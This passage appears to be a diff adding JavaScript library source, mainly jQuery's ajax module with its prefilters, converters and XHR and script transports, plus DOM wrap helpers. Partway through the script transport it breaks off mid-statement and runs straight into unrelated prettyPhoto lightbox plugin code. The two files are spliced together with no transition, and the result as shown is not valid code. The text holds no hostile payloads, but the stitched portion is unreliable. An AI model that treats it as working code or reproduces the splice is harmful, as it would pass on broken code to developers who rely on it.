rCRLF, "\r\n" ) }; + } ); + } + + return { name: elem.name, value: val.replace( rCRLF, "\r\n" ) }; + } ).get(); + } +} ); + + +var + r20 = /%20/g, + rhash = /#.*$/, + rantiCache = /([?&])_=[^&]*/, + rheaders = /^(.*?):[ \t]*([^\r\n]*)$/mg, + + // #7653, #8125, #8152: local protocol detection + rlocalProtocol = /^(?:about|app|app-storage|.+-extension|file|res|widget):$/, + rnoContent = /^(?:GET|HEAD)$/, + rprotocol = /^\/\//, + + /* Prefilters + * 1) They are useful to introduce custom dataTypes (see ajax/jsonp.js for an example) + * 2) These are called: + * - BEFORE asking for a transport + * - AFTER param serialization (s.data is a string if s.processData is true) + * 3) key is the dataType + * 4) the catchall symbol "*" can be used + * 5) execution will start with transport dataType and THEN continue down to "*" if needed + */ + prefilters = {}, + + /* Transports bindings + * 1) key is the dataType + * 2) the catchall symbol "*" can be used + * 3) selection will start with transport dataType and THEN go to "*" if needed + */ + transports = {}, + + // Avoid comment-prolog char sequence (#10098); must appease lint and evade compression + allTypes = "*/".concat( "*" ), + + // Anchor tag for parsing the document origin + originAnchor = document.createElement( "a" ); + originAnchor.href = location.href; + +// Base "constructor" for jQuery.ajaxPrefilter and jQuery.ajaxTransport +function addToPrefiltersOrTransports( structure ) { + + // dataTypeExpression is optional and defaults to "*" + return function( dataTypeExpression, func ) { + + if ( typeof dataTypeExpression !== "string" ) { + func = dataTypeExpression; + dataTypeExpression = "*"; + } + + var dataType, + i = 0, + dataTypes = dataTypeExpression.toLowerCase().match( rnothtmlwhite ) || []; + + if ( isFunction( func ) ) { + + // For each dataType in the dataTypeExpression + while ( ( dataType = dataTypes[ i++ ] ) ) { + + // Prepend if requested + if ( dataType[ 0 ] === "+" ) { + dataType = dataType.slice( 1 ) || "*"; + ( structure[ dataType ] = structure[ dataType ] || [] ).unshift( func ); + + // Otherwise append + } else { + ( structure[ dataType ] = structure[ dataType ] || [] ).push( func ); + } + } + } + }; +} + +// Base inspection function for prefilters and transports +function inspectPrefiltersOrTransports( structure, options, originalOptions, jqXHR ) { + + var inspected = {}, + seekingTransport = ( structure === transports ); + + function inspect( dataType ) { + var selected; + inspected[ dataType ] = true; + jQuery.each( structure[ dataType ] || [], function( _, prefilterOrFactory ) { + var dataTypeOrTransport = prefilterOrFactory( options, originalOptions, jqXHR ); + if ( typeof dataTypeOrTransport === "string" && + !seekingTransport && !inspected[ dataTypeOrTransport ] ) { + + options.dataTypes.unshift( dataTypeOrTransport ); + inspect( dataTypeOrTransport ); + return false; + } else if ( seekingTransport ) { + return !( selected = dataTypeOrTransport ); + } + } ); + return selected; + } + + return inspect( options.dataTypes[ 0 ] ) || !inspected[ "*" ] && inspect( "*" ); +} + +// A special extend for ajax options +// that takes "flat" options (not to be deep extended) +// Fixes #9887 +function ajaxExtend( target, src ) { + var key, deep, + flatOptions = jQuery.ajaxSettings.flatOptions || {}; + + for ( key in src ) { + if ( src[ key ] !== undefined ) { + ( flatOptions[ key ] ? target : ( deep || ( deep = {} ) ) )[ key ] = src[ key ]; + } + } + if ( deep ) { + jQuery.extend( true, target, deep ); + } + + return target; +} + +/* Handles responses to an ajax request: + * - finds the right dataType (mediates between content-type and expected dataType) + * - returns the corresponding response + */ +function ajaxHandleResponses( s, jqXHR, responses ) { + + var ct, type, finalDataType, firstDataType, + contents = s.contents, + dataTypes = s.dataTypes; + + // Remove auto dataType and get content-type in the process + while ( dataTypes[ 0 ] === "*" ) { + dataTypes.shift(); + if ( ct === undefined ) { + ct = s.mimeType || jqXHR.getResponseHeader( "Content-Type" ); + } + } + + // Check if we're dealing with a known content-type + if ( ct ) { + for ( type in contents ) { + if ( contents[ type ] && contents[ type ].test( ct ) ) { + dataTypes.unshift( type ); + break; + } + } + } + + // Check to see if we have a response for the expected dataType + if ( dataTypes[ 0 ] in responses ) { + finalDataType = dataTypes[ 0 ]; + } else { + + // Try convertible dataTypes + for ( type in responses ) { + if ( !dataTypes[ 0 ] || s.converters[ type + " " + dataTypes[ 0 ] ] ) { + finalDataType = type; + break; + } + if ( !firstDataType ) { + firstDataType = type; + } + } + + // Or just use first one + finalDataType = finalDataType || firstDataType; + } + + // If we found a dataType + // We add the dataType to the list if needed + // and return the corresponding response + if ( finalDataType ) { + if ( finalDataType !== dataTypes[ 0 ] ) { + dataTypes.unshift( finalDataType ); + } + return responses[ finalDataType ]; + } +} + +/* Chain conversions given the request and the original response + * Also sets the responseXXX fields on the jqXHR instance + */ +function ajaxConvert( s, response, jqXHR, isSuccess ) { + var conv2, current, conv, tmp, prev, + converters = {}, + + // Work with a copy of dataTypes in case we need to modify it for conversion + dataTypes = s.dataTypes.slice(); + + // Create converters map with lowercased keys + if ( dataTypes[ 1 ] ) { + for ( conv in s.converters ) { + converters[ conv.toLowerCase() ] = s.converters[ conv ]; + } + } + + current = dataTypes.shift(); + + // Convert to each sequential dataType + while ( current ) { + + if ( s.responseFields[ current ] ) { + jqXHR[ s.responseFields[ current ] ] = response; + } + + // Apply the dataFilter if provided + if ( !prev && isSuccess && s.dataFilter ) { + response = s.dataFilter( response, s.dataType ); + } + + prev = current; + current = dataTypes.shift(); + + if ( current ) { + + // There's only work to do if current dataType is non-auto + if ( current === "*" ) { + + current = prev; + + // Convert response if prev dataType is non-auto and differs from current + } else if ( prev !== "*" && prev !== current ) { + + // Seek a direct converter + conv = converters[ prev + " " + current ] || converters[ "* " + current ]; + + // If none found, seek a pair + if ( !conv ) { + for ( conv2 in converters ) { + + // If conv2 outputs current + tmp = conv2.split( " " ); + if ( tmp[ 1 ] === current ) { + + // If prev can be converted to accepted input + conv = converters[ prev + " " + tmp[ 0 ] ] || + converters[ "* " + tmp[ 0 ] ]; + if ( conv ) { + + // Condense equivalence converters + if ( conv === true ) { + conv = converters[ conv2 ]; + + // Otherwise, insert the intermediate dataType + } else if ( converters[ conv2 ] !== true ) { + current = tmp[ 0 ]; + dataTypes.unshift( tmp[ 1 ] ); + } + break; + } + } + } + } + + // Apply converter (if not an equivalence) + if ( conv !== true ) { + + // Unless errors are allowed to bubble, catch and return them + if ( conv && s.throws ) { + response = conv( response ); + } else { + try { + response = conv( response ); + } catch ( e ) { + return { + state: "parsererror", + error: conv ? e : "No conversion from " + prev + " to " + current + }; + } + } + } + } + } + } + + return { state: "success", data: response }; +} + +jQuery.extend( { + + // Counter for holding the number of active queries + active: 0, + + // Last-Modified header cache for next request + lastModified: {}, + etag: {}, + + ajaxSettings: { + url: location.href, + type: "GET", + isLocal: rlocalProtocol.test( location.protocol ), + global: true, + processData: true, + async: true, + contentType: "application/x-www-form-urlencoded; charset=UTF-8", + + /* + timeout: 0, + data: null, + dataType: null, + username: null, + password: null, + cache: null, + throws: false, + traditional: false, + headers: {}, + */ + + accepts: { + "*": allTypes, + text: "text/plain", + html: "text/html", + xml: "application/xml, text/xml", + json: "application/json, text/javascript" + }, + + contents: { + xml: /\bxml\b/, + html: /\bhtml/, + json: /\bjson\b/ + }, + + responseFields: { + xml: "responseXML", + text: "responseText", + json: "responseJSON" + }, + + // Data converters + // Keys separate source (or catchall "*") and destination types with a single space + converters: { + + // Convert anything to text + "* text": String, + + // Text to html (true = no transformation) + "text html": true, + + // Evaluate text as a json expression + "text json": JSON.parse, + + // Parse text as xml + "text xml": jQuery.parseXML + }, + + // For options that shouldn't be deep extended: + // you can add your own custom options here if + // and when you create one that shouldn't be + // deep extended (see ajaxExtend) + flatOptions: { + url: true, + context: true + } + }, + + // Creates a full fledged settings object into target + // with both ajaxSettings and settings fields. + // If target is omitted, writes into ajaxSettings. + ajaxSetup: function( target, settings ) { + return settings ? + + // Building a settings object + ajaxExtend( ajaxExtend( target, jQuery.ajaxSettings ), settings ) : + + // Extending ajaxSettings + ajaxExtend( jQuery.ajaxSettings, target ); + }, + + ajaxPrefilter: addToPrefiltersOrTransports( prefilters ), + ajaxTransport: addToPrefiltersOrTransports( transports ), + + // Main method + ajax: function( url, options ) { + + // If url is an object, simulate pre-1.5 signature + if ( typeof url === "object" ) { + options = url; + url = undefined; + } + + // Force options to be an object + options = options || {}; + + var transport, + + // URL without anti-cache param + cacheURL, + + // Response headers + responseHeadersString, + responseHeaders, + + // timeout handle + timeoutTimer, + + // Url cleanup var + urlAnchor, + + // Request state (becomes false upon send and true upon completion) + completed, + + // To know if global events are to be dispatched + fireGlobals, + + // Loop variable + i, + + // uncached part of the url + uncached, + + // Create the final options object + s = jQuery.ajaxSetup( {}, options ), + + // Callbacks context + callbackContext = s.context || s, + + // Context for global events is callbackContext if it is a DOM node or jQuery collection + globalEventContext = s.context && + ( callbackContext.nodeType || callbackContext.jquery ) ? + jQuery( callbackContext ) : + jQuery.event, + + // Deferreds + deferred = jQuery.Deferred(), + completeDeferred = jQuery.Callbacks( "once memory" ), + + // Status-dependent callbacks + statusCode = s.statusCode || {}, + + // Headers (they are sent all at once) + requestHeaders = {}, + requestHeadersNames = {}, + + // Default abort message + strAbort = "canceled", + + // Fake xhr + jqXHR = { + readyState: 0, + + // Builds headers hashtable if needed + getResponseHeader: function( key ) { + var match; + if ( completed ) { + if ( !responseHeaders ) { + responseHeaders = {}; + while ( ( match = rheaders.exec( responseHeadersString ) ) ) { + responseHeaders[ match[ 1 ].toLowerCase() + " " ] = + ( responseHeaders[ match[ 1 ].toLowerCase() + " " ] || [] ) + .concat( match[ 2 ] ); + } + } + match = responseHeaders[ key.toLowerCase() + " " ]; + } + return match == null ? null : match.join( ", " ); + }, + + // Raw string + getAllResponseHeaders: function() { + return completed ? responseHeadersString : null; + }, + + // Caches the header + setRequestHeader: function( name, value ) { + if ( completed == null ) { + name = requestHeadersNames[ name.toLowerCase() ] = + requestHeadersNames[ name.toLowerCase() ] || name; + requestHeaders[ name ] = value; + } + return this; + }, + + // Overrides response content-type header + overrideMimeType: function( type ) { + if ( completed == null ) { + s.mimeType = type; + } + return this; + }, + + // Status-dependent callbacks + statusCode: function( map ) { + var code; + if ( map ) { + if ( completed ) { + + // Execute the appropriate callbacks + jqXHR.always( map[ jqXHR.status ] ); + } else { + + // Lazy-add the new callbacks in a way that preserves old ones + for ( code in map ) { + statusCode[ code ] = [ statusCode[ code ], map[ code ] ]; + } + } + } + return this; + }, + + // Cancel the request + abort: function( statusText ) { + var finalText = statusText || strAbort; + if ( transport ) { + transport.abort( finalText ); + } + done( 0, finalText ); + return this; + } + }; + + // Attach deferreds + deferred.promise( jqXHR ); + + // Add protocol if not provided (prefilters might expect it) + // Handle falsy url in the settings object (#10093: consistency with old signature) + // We also use the url parameter if available + s.url = ( ( url || s.url || location.href ) + "" ) + .replace( rprotocol, location.protocol + "//" ); + + // Alias method option to type as per ticket #12004 + s.type = options.method || options.type || s.method || s.type; + + // Extract dataTypes list + s.dataTypes = ( s.dataType || "*" ).toLowerCase().match( rnothtmlwhite ) || [ "" ]; + + // A cross-domain request is in order when the origin doesn't match the current origin. + if ( s.crossDomain == null ) { + urlAnchor = document.createElement( "a" ); + + // Support: IE <=8 - 11, Edge 12 - 15 + // IE throws exception on accessing the href property if url is malformed, + // e.g. http://example.com:80x/ + try { + urlAnchor.href = s.url; + + // Support: IE <=8 - 11 only + // Anchor's host property isn't correctly set when s.url is relative + urlAnchor.href = urlAnchor.href; + s.crossDomain = originAnchor.protocol + "//" + originAnchor.host !== + urlAnchor.protocol + "//" + urlAnchor.host; + } catch ( e ) { + + // If there is an error parsing the URL, assume it is crossDomain, + // it can be rejected by the transport if it is invalid + s.crossDomain = true; + } + } + + // Convert data if not already a string + if ( s.data && s.processData && typeof s.data !== "string" ) { + s.data = jQuery.param( s.data, s.traditional ); + } + + // Apply prefilters + inspectPrefiltersOrTransports( prefilters, s, options, jqXHR ); + + // If request was aborted inside a prefilter, stop there + if ( completed ) { + return jqXHR; + } + + // We can fire global events as of now if asked to + // Don't fire events if jQuery.event is undefined in an AMD-usage scenario (#15118) + fireGlobals = jQuery.event && s.global; + + // Watch for a new set of requests + if ( fireGlobals && jQuery.active++ === 0 ) { + jQuery.event.trigger( "ajaxStart" ); + } + + // Uppercase the type + s.type = s.type.toUpperCase(); + + // Determine if request has content + s.hasContent = !rnoContent.test( s.type ); + + // Save the URL in case we're toying with the If-Modified-Since + // and/or If-None-Match header later on + // Remove hash to simplify url manipulation + cacheURL = s.url.replace( rhash, "" ); + + // More options handling for requests with no content + if ( !s.hasContent ) { + + // Remember the hash so we can put it back + uncached = s.url.slice( cacheURL.length ); + + // If data is available and should be processed, append data to url + if ( s.data && ( s.processData || typeof s.data === "string" ) ) { + cacheURL += ( rquery.test( cacheURL ) ? "&" : "?" ) + s.data; + + // #9682: remove data so that it's not used in an eventual retry + delete s.data; + } + + // Add or update anti-cache param if needed + if ( s.cache === false ) { + cacheURL = cacheURL.replace( rantiCache, "$1" ); + uncached = ( rquery.test( cacheURL ) ? "&" : "?" ) + "_=" + ( nonce.guid++ ) + + uncached; + } + + // Put hash and anti-cache on the URL that will be requested (gh-1732) + s.url = cacheURL + uncached; + + // Change '%20' to '+' if this is encoded form body content (gh-2658) + } else if ( s.data && s.processData && + ( s.contentType || "" ).indexOf( "application/x-www-form-urlencoded" ) === 0 ) { + s.data = s.data.replace( r20, "+" ); + } + + // Set the If-Modified-Since and/or If-None-Match header, if in ifModified mode. + if ( s.ifModified ) { + if ( jQuery.lastModified[ cacheURL ] ) { + jqXHR.setRequestHeader( "If-Modified-Since", jQuery.lastModified[ cacheURL ] ); + } + if ( jQuery.etag[ cacheURL ] ) { + jqXHR.setRequestHeader( "If-None-Match", jQuery.etag[ cacheURL ] ); + } + } + + // Set the correct header, if data is being sent + if ( s.data && s.hasContent && s.contentType !== false || options.contentType ) { + jqXHR.setRequestHeader( "Content-Type", s.contentType ); + } + + // Set the Accepts header for the server, depending on the dataType + jqXHR.setRequestHeader( + "Accept", + s.dataTypes[ 0 ] && s.accepts[ s.dataTypes[ 0 ] ] ? + s.accepts[ s.dataTypes[ 0 ] ] + + ( s.dataTypes[ 0 ] !== "*" ? ", " + allTypes + "; q=0.01" : "" ) : + s.accepts[ "*" ] + ); + + // Check for headers option + for ( i in s.headers ) { + jqXHR.setRequestHeader( i, s.headers[ i ] ); + } + + // Allow custom headers/mimetypes and early abort + if ( s.beforeSend && + ( s.beforeSend.call( callbackContext, jqXHR, s ) === false || completed ) ) { + + // Abort if not done already and return + return jqXHR.abort(); + } + + // Aborting is no longer a cancellation + strAbort = "abort"; + + // Install callbacks on deferreds + completeDeferred.add( s.complete ); + jqXHR.done( s.success ); + jqXHR.fail( s.error ); + + // Get transport + transport = inspectPrefiltersOrTransports( transports, s, options, jqXHR ); + + // If no transport, we auto-abort + if ( !transport ) { + done( -1, "No Transport" ); + } else { + jqXHR.readyState = 1; + + // Send global event + if ( fireGlobals ) { + globalEventContext.trigger( "ajaxSend", [ jqXHR, s ] ); + } + + // If request was aborted inside ajaxSend, stop there + if ( completed ) { + return jqXHR; + } + + // Timeout + if ( s.async && s.timeout > 0 ) { + timeoutTimer = window.setTimeout( function() { + jqXHR.abort( "timeout" ); + }, s.timeout ); + } + + try { + completed = false; + transport.send( requestHeaders, done ); + } catch ( e ) { + + // Rethrow post-completion exceptions + if ( completed ) { + throw e; + } + + // Propagate others as results + done( -1, e ); + } + } + + // Callback for when everything is done + function done( status, nativeStatusText, responses, headers ) { + var isSuccess, success, error, response, modified, + statusText = nativeStatusText; + + // Ignore repeat invocations + if ( completed ) { + return; + } + + completed = true; + + // Clear timeout if it exists + if ( timeoutTimer ) { + window.clearTimeout( timeoutTimer ); + } + + // Dereference transport for early garbage collection + // (no matter how long the jqXHR object will be used) + transport = undefined; + + // Cache response headers + responseHeadersString = headers || ""; + + // Set readyState + jqXHR.readyState = status > 0 ? 4 : 0; + + // Determine if successful + isSuccess = status >= 200 && status < 300 || status === 304; + + // Get response data + if ( responses ) { + response = ajaxHandleResponses( s, jqXHR, responses ); + } + + // Use a noop converter for missing script + if ( !isSuccess && jQuery.inArray( "script", s.dataTypes ) > -1 ) { + s.converters[ "text script" ] = function() {}; + } + + // Convert no matter what (that way responseXXX fields are always set) + response = ajaxConvert( s, response, jqXHR, isSuccess ); + + // If successful, handle type chaining + if ( isSuccess ) { + + // Set the If-Modified-Since and/or If-None-Match header, if in ifModified mode. + if ( s.ifModified ) { + modified = jqXHR.getResponseHeader( "Last-Modified" ); + if ( modified ) { + jQuery.lastModified[ cacheURL ] = modified; + } + modified = jqXHR.getResponseHeader( "etag" ); + if ( modified ) { + jQuery.etag[ cacheURL ] = modified; + } + } + + // if no content + if ( status === 204 || s.type === "HEAD" ) { + statusText = "nocontent"; + + // if not modified + } else if ( status === 304 ) { + statusText = "notmodified"; + + // If we have data, let's convert it + } else { + statusText = response.state; + success = response.data; + error = response.error; + isSuccess = !error; + } + } else { + + // Extract error from statusText and normalize for non-aborts + error = statusText; + if ( status || !statusText ) { + statusText = "error"; + if ( status < 0 ) { + status = 0; + } + } + } + + // Set data for the fake xhr object + jqXHR.status = status; + jqXHR.statusText = ( nativeStatusText || statusText ) + ""; + + // Success/Error + if ( isSuccess ) { + deferred.resolveWith( callbackContext, [ success, statusText, jqXHR ] ); + } else { + deferred.rejectWith( callbackContext, [ jqXHR, statusText, error ] ); + } + + // Status-dependent callbacks + jqXHR.statusCode( statusCode ); + statusCode = undefined; + + if ( fireGlobals ) { + globalEventContext.trigger( isSuccess ? "ajaxSuccess" : "ajaxError", + [ jqXHR, s, isSuccess ? success : error ] ); + } + + // Complete + completeDeferred.fireWith( callbackContext, [ jqXHR, statusText ] ); + + if ( fireGlobals ) { + globalEventContext.trigger( "ajaxComplete", [ jqXHR, s ] ); + + // Handle the global AJAX counter + if ( !( --jQuery.active ) ) { + jQuery.event.trigger( "ajaxStop" ); + } + } + } + + return jqXHR; + }, + + getJSON: function( url, data, callback ) { + return jQuery.get( url, data, callback, "json" ); + }, + + getScript: function( url, callback ) { + return jQuery.get( url, undefined, callback, "script" ); + } +} ); + +jQuery.each( [ "get", "post" ], function( _i, method ) { + jQuery[ method ] = function( url, data, callback, type ) { + + // Shift arguments if data argument was omitted + if ( isFunction( data ) ) { + type = type || callback; + callback = data; + data = undefined; + } + + // The url can be an options object (which then must have .url) + return jQuery.ajax( jQuery.extend( { + url: url, + type: method, + dataType: type, + data: data, + success: callback + }, jQuery.isPlainObject( url ) && url ) ); + }; +} ); + +jQuery.ajaxPrefilter( function( s ) { + var i; + for ( i in s.headers ) { + if ( i.toLowerCase() === "content-type" ) { + s.contentType = s.headers[ i ] || ""; + } + } +} ); + + +jQuery._evalUrl = function( url, options, doc ) { + return jQuery.ajax( { + url: url, + + // Make this explicit, since user can override this through ajaxSetup (#11264) + type: "GET", + dataType: "script", + cache: true, + async: false, + global: false, + + // Only evaluate the response if it is successful (gh-4126) + // dataFilter is not invoked for failure responses, so using it instead + // of the default converter is kludgy but it works. + converters: { + "text script": function() {} + }, + dataFilter: function( response ) { + jQuery.globalEval( response, options, doc ); + } + } ); +}; + + +jQuery.fn.extend( { + wrapAll: function( html ) { + var wrap; + + if ( this[ 0 ] ) { + if ( isFunction( html ) ) { + html = html.call( this[ 0 ] ); + } + + // The elements to wrap the target around + wrap = jQuery( html, this[ 0 ].ownerDocument ).eq( 0 ).clone( true ); + + if ( this[ 0 ].parentNode ) { + wrap.insertBefore( this[ 0 ] ); + } + + wrap.map( function() { + var elem = this; + + while ( elem.firstElementChild ) { + elem = elem.firstElementChild; + } + + return elem; + } ).append( this ); + } + + return this; + }, + + wrapInner: function( html ) { + if ( isFunction( html ) ) { + return this.each( function( i ) { + jQuery( this ).wrapInner( html.call( this, i ) ); + } ); + } + + return this.each( function() { + var self = jQuery( this ), + contents = self.contents(); + + if ( contents.length ) { + contents.wrapAll( html ); + + } else { + self.append( html ); + } + } ); + }, + + wrap: function( html ) { + var htmlIsFunction = isFunction( html ); + + return this.each( function( i ) { + jQuery( this ).wrapAll( htmlIsFunction ? html.call( this, i ) : html ); + } ); + }, + + unwrap: function( selector ) { + this.parent( selector ).not( "body" ).each( function() { + jQuery( this ).replaceWith( this.childNodes ); + } ); + return this; + } +} ); + + +jQuery.expr.pseudos.hidden = function( elem ) { + return !jQuery.expr.pseudos.visible( elem ); +}; +jQuery.expr.pseudos.visible = function( elem ) { + return !!( elem.offsetWidth || elem.offsetHeight || elem.getClientRects().length ); +}; + + + + +jQuery.ajaxSettings.xhr = function() { + try { + return new window.XMLHttpRequest(); + } catch ( e ) {} +}; + +var xhrSuccessStatus = { + + // File protocol always yields status code 0, assume 200 + 0: 200, + + // Support: IE <=9 only + // #1450: sometimes IE returns 1223 when it should be 204 + 1223: 204 + }, + xhrSupported = jQuery.ajaxSettings.xhr(); + +support.cors = !!xhrSupported && ( "withCredentials" in xhrSupported ); +support.ajax = xhrSupported = !!xhrSupported; + +jQuery.ajaxTransport( function( options ) { + var callback, errorCallback; + + // Cross domain only allowed if supported through XMLHttpRequest + if ( support.cors || xhrSupported && !options.crossDomain ) { + return { + send: function( headers, complete ) { + var i, + xhr = options.xhr(); + + xhr.open( + options.type, + options.url, + options.async, + options.username, + options.password + ); + + // Apply custom fields if provided + if ( options.xhrFields ) { + for ( i in options.xhrFields ) { + xhr[ i ] = options.xhrFields[ i ]; + } + } + + // Override mime type if needed + if ( options.mimeType && xhr.overrideMimeType ) { + xhr.overrideMimeType( options.mimeType ); + } + + // X-Requested-With header + // For cross-domain requests, seeing as conditions for a preflight are + // akin to a jigsaw puzzle, we simply never set it to be sure. + // (it can always be set on a per-request basis or even using ajaxSetup) + // For same-domain requests, won't change header if already provided. + if ( !options.crossDomain && !headers[ "X-Requested-With" ] ) { + headers[ "X-Requested-With" ] = "XMLHttpRequest"; + } + + // Set headers + for ( i in headers ) { + xhr.setRequestHeader( i, headers[ i ] ); + } + + // Callback + callback = function( type ) { + return function() { + if ( callback ) { + callback = errorCallback = xhr.onload = + xhr.onerror = xhr.onabort = xhr.ontimeout = + xhr.onreadystatechange = null; + + if ( type === "abort" ) { + xhr.abort(); + } else if ( type === "error" ) { + + // Support: IE <=9 only + // On a manual native abort, IE9 throws + // errors on any property access that is not readyState + if ( typeof xhr.status !== "number" ) { + complete( 0, "error" ); + } else { + complete( + + // File: protocol always yields status 0; see #8605, #14207 + xhr.status, + xhr.statusText + ); + } + } else { + complete( + xhrSuccessStatus[ xhr.status ] || xhr.status, + xhr.statusText, + + // Support: IE <=9 only + // IE9 has no XHR2 but throws on binary (trac-11426) + // For XHR2 non-text, let the caller handle it (gh-2498) + ( xhr.responseType || "text" ) !== "text" || + typeof xhr.responseText !== "string" ? + { binary: xhr.response } : + { text: xhr.responseText }, + xhr.getAllResponseHeaders() + ); + } + } + }; + }; + + // Listen to events + xhr.onload = callback(); + errorCallback = xhr.onerror = xhr.ontimeout = callback( "error" ); + + // Support: IE 9 only + // Use onreadystatechange to replace onabort + // to handle uncaught aborts + if ( xhr.onabort !== undefined ) { + xhr.onabort = errorCallback; + } else { + xhr.onreadystatechange = function() { + + // Check readyState before timeout as it changes + if ( xhr.readyState === 4 ) { + + // Allow onerror to be called first, + // but that will not handle a native abort + // Also, save errorCallback to a variable + // as xhr.onerror cannot be accessed + window.setTimeout( function() { + if ( callback ) { + errorCallback(); + } + } ); + } + }; + } + + // Create the abort callback + callback = callback( "abort" ); + + try { + + // Do send the request (this may raise an exception) + xhr.send( options.hasContent && options.data || null ); + } catch ( e ) { + + // #14683: Only rethrow if this hasn't been notified as an error yet + if ( callback ) { + throw e; + } + } + }, + + abort: function() { + if ( callback ) { + callback(); + } + } + }; + } +} ); + + + + +// Prevent auto-execution of scripts when no explicit dataType was provided (See gh-2432) +jQuery.ajaxPrefilter( function( s ) { + if ( s.crossDomain ) { + s.contents.script = false; + } +} ); + +// Install script dataType +jQuery.ajaxSetup( { + accepts: { + script: "text/javascript, application/javascript, " + + "application/ecmascript, application/x-ecmascript" + }, + contents: { + script: /\b(?:java|ecma)script\b/ + }, + converters: { + "text script": function( text ) { + jQuery.globalEval( text ); + return text; + } + } +} ); + +// Handle cache's special case and crossDomain +jQuery.ajaxPrefilter( "script", function( s ) { + if ( s.cache === undefined ) { + s.cache = false; + } + if ( s.crossDomain ) { + s.type = "GET"; + } +} ); + +// Bind script tag hack transport +jQuery.ajaxTransport( "script", function( s ) { + + // This transport only deals with cross domain or forced-by-attrs requests + if ( s.crossDomain || s.scriptAttrs ) { + var script, callback; + return { + send: function( _, complete ) { + script = jQuery( "' /* html or false to disable */ + }, pp_settings); + + // Global variables accessible only by prettyPhoto + var matchedObjects = this, percentBased = false, pp_dimensions, pp_open, + + // prettyPhoto container specific + pp_contentHeight, pp_contentWidth, pp_containerHeight, pp_containerWidth, + + // Window size + windowHeight = $(window).height(), windowWidth = $(window).width(), + + // Global elements + pp_slideshow; + + doresize = true, scroll_pos = _get_scroll(); + + // Window/Keyboard events + $(window).unbind('resize.prettyphoto').bind('resize.prettyphoto',function(){ _center_overlay(); _resize_overlay(); }); + + if(pp_settings.keyboard_shortcuts) { + $(document).unbind('keydown.prettyphoto').bind('keydown.prettyphoto',function(e){ + if(typeof $pp_pic_holder != 'undefined'){ + if($pp_pic_holder.is(':visible')){ + switch(e.keyCode){ + case 37: + $.prettyPhoto.changePage('previous'); + e.preventDefault(); + break; + case 39: + $.prettyPhoto.changePage('next'); + e.preventDefault(); + break; + case 27: + if(!settings.modal) + $.prettyPhoto.close(); + e.preventDefault(); + break; + }; + // return false; + }; + }; + }); + }; + + /** + * Initialize prettyPhoto. + */ + $.prettyPhoto.initialize = function() { + + settings = pp_settings; + + if(settings.theme == 'pp_default') settings.horizontal_padding = 16; + if(settings.ie6_fallback && $.browser.msie && parseInt($.browser.version) == 6) settings.theme = "light_square"; // Fallback to a supported theme for IE6 + + // Find out if the picture is part of a set + theRel = $(this).attr(settings.hook); + galleryRegExp = /\[(?:.*)\]/; + isSet = (galleryRegExp.exec(theRel)) ? true : false; + + // Put the SRCs, TITLEs, ALTs into an array. + pp_images = (isSet) ? jQuery.map(matchedObjects, function(n, i){ if($(n).attr(settings.hook).indexOf(theRel) != -1) return $(n).attr('href'); }) : $.makeArray($(this).attr('href')); + pp_titles = (isSet) ? jQuery.map(matchedObjects, function(n, i){ if($(n).attr(settings.hook).indexOf(theRel) != -1) return ($(n).find('img').attr('alt')) ? $(n).find('img').attr('alt') : ""; }) : $.makeArray($(this).find('img').attr('alt')); + pp_descriptions = (isSet) ? jQuery.map(matchedObjects, function(n, i){ if($(n).attr(settings.hook).indexOf(theRel) != -1) return ($(n).attr('title')) ? $(n).attr('title') : ""; }) : $.makeArray($(this).attr('title')); + + if(pp_images.length > settings.overlay_gallery_max) settings.overlay_gallery = false; + + set_position = jQuery.inArray($(this).attr('href'), pp_images); // Define where in the array the clicked item is positionned + rel_index = (isSet) ? set_position : $("a["+settings.hook+"^='"+theRel+"']").index($(this)); + + _build_overlay(this); // Build the overlay {this} being the caller + + if(settings.allow_resize) + $(window).bind('scroll.prettyphoto',function(){ _center_overlay(); }); + + + $.prettyPhoto.open(); + + return false; + } + + + /** + * Opens the prettyPhoto modal box. + * @param image {String,Array} Full path to the image to be open, can also be an array containing full images paths. + * @param title {String,Array} The title to be displayed with the picture, can also be an array containing all the titles. + * @param description {String,Array} The description to be displayed with the picture, can also be an array containing all the descriptions. + */ + $.prettyPhoto.open = function(event) { + if(typeof settings == "undefined"){ // Means it's an API call, need to manually get the settings and set the variables + settings = pp_settings; + if($.browser.msie && $.browser.version == 6) settings.theme = "light_square"; // Fallback to a supported theme for IE6 + pp_images = $.makeArray(arguments[0]); + pp_titles = (arguments[1]) ? $.makeArray(arguments[1]) : $.makeArray(""); + pp_descriptions = (arguments[2]) ? $.makeArray(arguments[2]) : $.makeArray(""); + isSet = (pp_images.length > 1) ? true : false; + set_position = (arguments[3])? arguments[3]: 0; + _build_overlay(event.target); // Build the overlay {this} being the caller + } + + if($.browser.msie && $.browser.version == 6) $('select').css('visibility','hidden'); // To fix the bug with IE select boxes + + if(settings.hideflash) $('object,embed,iframe[src*=youtube],iframe[src*=vimeo]').css('visibility','hidden'); // Hide the flash + + _checkPosition($(pp_images).size()); // Hide the next/previous links if on first or last images. + + $('.pp_loaderIcon').show(); + + if(settings.deeplinking) + setHashtag(); + + // Rebuild Facebook Like Button with updated href + if(settings.social_tools){ + facebook_like_link = settings.social_tools.replace('{location_href}', encodeURIComponent(location.href)); + $pp_pic_holder.find('.pp_social').html(facebook_like_link); + } + + // Fade the content in + if($ppt.is(':hidden')) $ppt.css('opacity',0).show(); + $pp_overlay.show().fadeTo(settings.animation_speed,settings.opacity); + + // Display the current position + $pp_pic_holder.find('.currentTextHolder').text((set_position+1) + settings.counter_separator_label + $(pp_images).size()); + + // Set the description + if(typeof pp_descriptions[set_position] != 'undefined' && pp_descriptions[set_position] != ""){ + $pp_pic_holder.find('.pp_description').show().html(unescape(pp_descriptions[set_position])); + }else{ + $pp_pic_holder.find('.pp_description').hide(); + } + + // Get the dimensions + movie_width = ( parseFloat(getParam('width',pp_images[set_position])) ) ? getParam('width',pp_images[set_position]) : settings.default_width.toString(); + movie_height = ( parseFloat(getParam('height',pp_images[set_position])) ) ? getParam('height',pp_images[set_position]) : settings.default_height.toString(); + + // If the size is % based, calculate according to window dimensions + percentBased=false; + if(movie_height.indexOf('%') != -1) { movie_height = parseFloat(($(window).height() * parseFloat(movie_height) / 100) - 150); percentBased = true; } + if(movie_width.indexOf('%') != -1) { movie_width = parseFloat(($(window).width() * parseFloat(movie_width) / 100) - 150); percentBased = true; } + + // Fade the holder + $pp_pic_holder.fadeIn(function(){ + // Set the title + (settings.show_title && pp_titles[set_position] != "" && typeof pp_titles[set_position] != "undefined") ? $ppt.html(unescape(pp_titles[set_position])) : $ppt.html(' '); + + imgPreloader = ""; + skipInjection = false; 